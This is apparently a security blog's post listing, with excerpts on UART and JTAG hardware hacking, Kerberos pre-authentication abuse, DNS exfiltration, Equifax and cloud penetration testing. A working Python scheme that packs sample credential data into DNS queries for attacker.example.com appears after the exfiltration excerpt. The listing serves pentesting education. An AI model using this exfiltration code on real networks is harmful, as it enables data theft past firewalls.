Discovering UART with the JTAGulator and connecting to it with UART PassThrough and a USB-to-UART! Introduction UART stands for Universal Asynchronous Receiver/Transmitter; in the context of hardware hacking, however, we are generally looking for a serial interface that gives us text output from the system and possibly accepts command input. The general intention from the manufacturer's point of view is to allow easy debugging, both out of the factory (to check the system is working as intended) and if a device is returned as broken.
Discovering JTAG ports with the JTAGulator, and connecting to them with the UM232H! What is JTAG? JTAG is short for Joint Test Action Group and generally refers to on-chip debugging interfaces that follow the IEEE 1149.x standard. The standard doesn't mandate a particular connector; it dictates how to communicate with the chips in a device. It uses four mandatory pins, TCK, TMS, TDI and TDO, plus an optional fifth, TRST; these are (Test) Clock, Mode Select, Data In, Data Out and Reset. It can be useful to hardware hackers in various ways, such as extracting device IDs, extracting firmware and overwriting memory.
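What "extracting device IDs" looks like at the pin level, as an added example that is not code from the original post: the host drives TMS and TDI and samples TDO on each TCK cycle, walks the IEEE 1149.1 TAP controller from Test-Logic-Reset into Shift-DR, and shifts the 32-bit IDCODE out LSB first. The target here is a simulated TAP written for this example (a real probe such as the UM232H would replace the `clock` method with GPIO toggling); the sample IDCODE 0x4BA00477 is the widely documented ARM CoreSight JTAG-DP value, used only as a constructed input.

```python
"""Reading a JTAG IDCODE by walking the IEEE 1149.1 TAP state machine.

Added example: the target is a simulated TAP, not a real chip.  The four
mandatory pins are modelled as the arguments (TMS, TDI) and return value
(TDO) of one TCK cycle.
"""

# TAP controller transitions: state -> (next if TMS=0, next if TMS=1)
TAP_NEXT = {
    "TEST_LOGIC_RESET": ("RUN_TEST_IDLE", "TEST_LOGIC_RESET"),
    "RUN_TEST_IDLE":    ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
    "SELECT_DR_SCAN":   ("CAPTURE_DR", "SELECT_IR_SCAN"),
    "CAPTURE_DR":       ("SHIFT_DR", "EXIT1_DR"),
    "SHIFT_DR":         ("SHIFT_DR", "EXIT1_DR"),
    "EXIT1_DR":         ("PAUSE_DR", "UPDATE_DR"),
    "PAUSE_DR":         ("PAUSE_DR", "EXIT2_DR"),
    "EXIT2_DR":         ("SHIFT_DR", "UPDATE_DR"),
    "UPDATE_DR":        ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
    "SELECT_IR_SCAN":   ("CAPTURE_IR", "TEST_LOGIC_RESET"),
    "CAPTURE_IR":       ("SHIFT_IR", "EXIT1_IR"),
    "SHIFT_IR":         ("SHIFT_IR", "EXIT1_IR"),
    "EXIT1_IR":         ("PAUSE_IR", "UPDATE_IR"),
    "PAUSE_IR":         ("PAUSE_IR", "EXIT2_IR"),
    "EXIT2_IR":         ("SHIFT_IR", "UPDATE_IR"),
    "UPDATE_IR":        ("RUN_TEST_IDLE", "SELECT_DR_SCAN"),
}


class SimulatedTap:
    """One simulated device on the scan chain (constructed for this example).

    After Test-Logic-Reset the IDCODE register is selected, so a DR scan with
    no instruction loaded shifts the 32-bit IDCODE out of TDO, LSB first.
    """

    def __init__(self, idcode, start_state="SHIFT_IR"):
        self.idcode = idcode & 0xFFFFFFFF
        self.state = start_state      # unknown at power-up; the reset fixes it
        self.shift_reg = 0

    def clock(self, tms, tdi):
        """One TCK cycle: return the TDO bit, then apply the rising-edge action."""
        # TDO is driven on the falling edge, so the host samples the current
        # LSB of the shift register before this rising edge shifts it along.
        tdo = (self.shift_reg & 1) if self.state == "SHIFT_DR" else 0
        if self.state == "CAPTURE_DR":
            self.shift_reg = self.idcode                       # parallel load
        elif self.state == "SHIFT_DR":
            self.shift_reg = (self.shift_reg >> 1) | (tdi << 31)
        self.state = TAP_NEXT[self.state][tms]
        return tdo


def read_idcode(tap):
    """Host side: reset the TAP, run one DR scan and return the 32-bit IDCODE."""
    for _ in range(5):            # five TMS=1 clocks reach TLR from any state
        tap.clock(1, 0)
    for tms in (0, 1, 0, 0):      # TLR -> RTI -> Select-DR -> Capture-DR -> Shift-DR
        tap.clock(tms, 0)
    idcode = 0
    for i in range(32):
        tms = 1 if i == 31 else 0          # leave Shift-DR with the last bit
        idcode |= tap.clock(tms, 0) << i   # LSB comes out first
    tap.clock(1, 0)                        # Exit1-DR -> Update-DR
    tap.clock(0, 0)                        # Update-DR -> Run-Test/Idle
    return idcode


def decode_idcode(idcode):
    """Split an IDCODE into its IEEE 1149.1 fields.

    Bit 0 is always 1 (a BYPASS register shifts out a 0 first), bits 1-11
    are the JEDEC manufacturer code, 12-27 the part number, 28-31 the version.
    """
    if idcode & 1 == 0:
        raise ValueError("bit 0 clear: no IDCODE register (BYPASS?) or bad wiring")
    return {
        "manufacturer": (idcode >> 1) & 0x7FF,
        "part": (idcode >> 12) & 0xFFFF,
        "version": (idcode >> 28) & 0xF,
    }


if __name__ == "__main__":
    code = read_idcode(SimulatedTap(0x4BA00477))   # constructed sample device
    print(hex(code), decode_idcode(code))
```

The reset at the start is the important habit to carry over to real hardware: the TAP's state after power-up is unknown, and five TMS-high clocks land in Test-Logic-Reset from any of the sixteen states, which is also what selects IDCODE as the default data register.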
Back in 2016, Geoffrey Janjua of Exumbra Operations Group presented at LayerOne on “Kerberos Party Tricks”, abusing user accounts that have Kerberos pre-authentication disabled. The Python script he released at the time was a great proof of concept, but there are alternative tools available now for detecting, and exploiting, this issue.
Following a successful penetration test, you may have large amounts of data to exfiltrate from an environment specifically hardened to make exfiltration difficult. For example, the network might have a firewall that explicitly blocks common exfiltration channels such as SSH, HTTPS and HTTP. It is common that you can still exfiltrate data from such networks by using DNS: for example, you could make a request for a name under a domain you control, where the subdomain carries the data to be exfiltrated, such as sensitive-data-here.attacker.example.com. DNS is a recursive system, such that if you send this request to …
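The mechanics of packing data into query names, as an added example that is not code from the original post: the payload is compressed, base32-encoded (DNS is case-insensitive and resolvers may change case, so base64 is unsafe), cut into labels of at most 63 characters and names of at most 253, and each name carries a sequence number and total so the authoritative server can reassemble chunks that arrive out of order and notice lost ones. The domain attacker.example.com and the sample payload are constructed for illustration; nothing here sends traffic.

```python
"""Packing data into DNS query names and reassembling it on the receiving end.

Added example, not code from the original post.  attacker.example.com and the
sample payload are constructed for illustration; nothing here sends traffic.
It builds the names a client would resolve (the recursive resolver forwards
them to the authoritative server for the domain) and decodes them the way
that server would from its query log.
"""
import base64
import zlib

DOMAIN = "attacker.example.com"   # assumed attacker-controlled zone
MAX_LABEL = 63                    # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                    # a full name is at most 253 printable characters


def _b32(data):
    # base32 survives resolver case folding (0x20 randomisation); base64 would not
    return base64.b32encode(data).decode().rstrip("=").lower()


def _unb32(text):
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(payload, domain=DOMAIN, session="s1"):
    """Split payload into names: <seq><total>-<session>.<data labels>.<domain>."""
    text = _b32(zlib.compress(payload))    # compress first: every byte costs queries
    header_len = 8 + 1 + len(session)      # 4 hex seq + 4 hex total + '-' + session
    # name = header.label(.label)*.domain -> header_len + len(domain) + 1 + 64*n
    labels_per_name = (MAX_NAME - header_len - len(domain) - 1) // (MAX_LABEL + 1)
    if labels_per_name < 1:
        raise ValueError("domain too long to carry any data")
    chunk_chars = labels_per_name * MAX_LABEL
    chunks = [text[i:i + chunk_chars] for i in range(0, len(text), chunk_chars)]
    names = []
    for seq, chunk in enumerate(chunks):
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:04x}{len(chunks):04x}-{session}"] + labels + [domain])
        assert len(name) <= MAX_NAME
        names.append(name)
    return names


def decode_queries(names, domain=DOMAIN, session="s1"):
    """Reassemble the payload from logged query names, arriving in any order."""
    suffix = "." + domain
    chunks, total = {}, None
    for name in names:
        name = name.lower().rstrip(".")      # resolvers may change case or add a dot
        if not name.endswith(suffix):
            continue                         # unrelated query for the same zone
        labels = name[:-len(suffix)].split(".")
        head, _, sess = labels[0].partition("-")
        if sess != session or len(head) != 8:
            continue
        chunks[int(head[:4], 16)] = "".join(labels[1:])
        total = int(head[4:], 16)
    if total is None:
        raise ValueError("no chunks for this session")
    missing = [i for i in range(total) if i not in chunks]
    if missing:
        raise ValueError(f"lost chunks (retransmit): {missing}")
    return zlib.decompress(_unb32("".join(chunks[i] for i in range(total))))


if __name__ == "__main__":
    # constructed sample: a short credential dump plus some binary padding
    sample = b"user,hash\nalice,5f4dcc3b5aa765d61d8327deb882cf99\n" + bytes(range(256))
    for n in encode_queries(sample):
        print(n)                             # resolve each, e.g. `dig +short <name>`
    assert decode_queries(encode_queries(sample)) == sample
```

Recursive resolvers cache answers, so a repeated chunk with an identical name may never reach the authoritative server a second time; the per-session label in the header is what keeps retransmissions and separate runs distinct.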
Summary In 2017 Equifax were breached; the breach was discovered on July 29 and an announcement was published on September 7. It wasn't the largest breach of all time, nor even of 2017, but it was big and the data was sensitive. Over the two weeks following the announcement, Equifax stock fell from 142.72 to 92.98 (a 34.85% fall).
The Problems of Security Testing and Unmanageable Reports I'd like to talk a little about security testing, the problem of information overload and issue prioritisation. To do this I intend to discuss broadly some of the problems with the various options for security testing that organisations have. I've written about some related things before, if you'd like a warm-up: Vulnerability Assessments vs Penetration Tests; Security is Hard: Why are you laughing; Security is Hard: Where do I start. However, today I'd like to look at security a little more strategically and to discuss the wider problems …
Introduction I recently wrote an introduction to cloud computing and an introduction to PenTesting an AWS environment. That was a sensible place to start given that, as I noted there, in Q1 of 2018 Amazon held a 33% market share in cloud whereas Microsoft held only 13%. However, I did want to add a few notes here that are specific to PenTesting within Azure environments.
Many Clouds in the Sky A couple of days ago I posted an article about Penetration Testing within AWS. I commented on the different kinds of testing within that kind of environment, but I didn't add much detail about the kinds of environments themselves, as I was speaking specifically of AWS. So I decided to break things down a little further: Part 1. An Introduction to Cloud Computing (you are here) Part 2. An Introduction to Penetration Testing AWS: Same Same, but Different Part 3. An Introduction to PenTesting Azure I'm going to do a short piece here to …
Same Same, but Different Introduction When penetration testing Amazon Web Services (AWS) environments there are different perspectives an assessment could take; some are very similar to external infrastructure or web application assessments and some are different. I'll separate the things that are the same from the things that are different from traditional penetration testing by considering the following types of cloud testing, and then breaking each one down into the kinds of testing that could take place: